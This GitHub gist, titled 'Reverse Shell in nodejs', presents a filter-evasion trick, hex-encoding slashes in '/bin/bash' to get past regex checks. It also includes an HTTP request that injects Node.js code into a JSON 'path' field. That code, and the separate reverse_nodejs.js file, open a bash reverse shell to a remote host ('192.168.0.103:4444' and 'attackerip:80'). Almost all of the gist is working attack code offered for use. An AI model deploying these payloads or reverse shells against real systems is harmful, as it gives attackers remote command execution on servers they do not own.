Skip to content

Instantly share code, notes, and snippets.

@enderphan94

enderphan94/Readme.md

Last active September 12, 2020 08:06
Show Gist options
  • Save enderphan94/dcd2305af9c3e94c9bd6d52ba8a5f51a to your computer and use it in GitHub Desktop.
Save enderphan94/dcd2305af9c3e94c9bd6d52ba8a5f51a to your computer and use it in GitHub Desktop.
Download ZIP
Reverse Shell in nodejs #nodejs #shell
Raw
Readme.md

JavaScript strings can by design be composed of hex-encoded characters, in addition to other encodings. So we should be able to hex-encode our forward slashes and bypass the restrictions of the regex parsing. We gotta do some hex-encoding scheme to the cmd string

\\x2fbin\\x2fbash

e.g:

POST /users HTTP/1.1
Host: 172.118.132.4
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.23.0
Content-Length: 482

{
  "requests": [
    {
      "method": "get",
      "path": "/age"
    },
    {
      "method": "get",
      "path": "/balance"
    },
    {
      "method": "get",
      "path": "/card/$id;ar net = require(\"net\"), sh = require("child_process").exec(\"\\x2fbin\\x2fbas\");  var client = new net.Socket(); client.connect(4444, \"192.168.0.103\", function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);});"
    }
  ]
}
Raw
reverse_nodejs.js
var net = require("net"), sh = require("child_process").exec("\\x2fbin\\x2fbash");
var client = new net.Socket();
client.connect(80, "attackerip", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment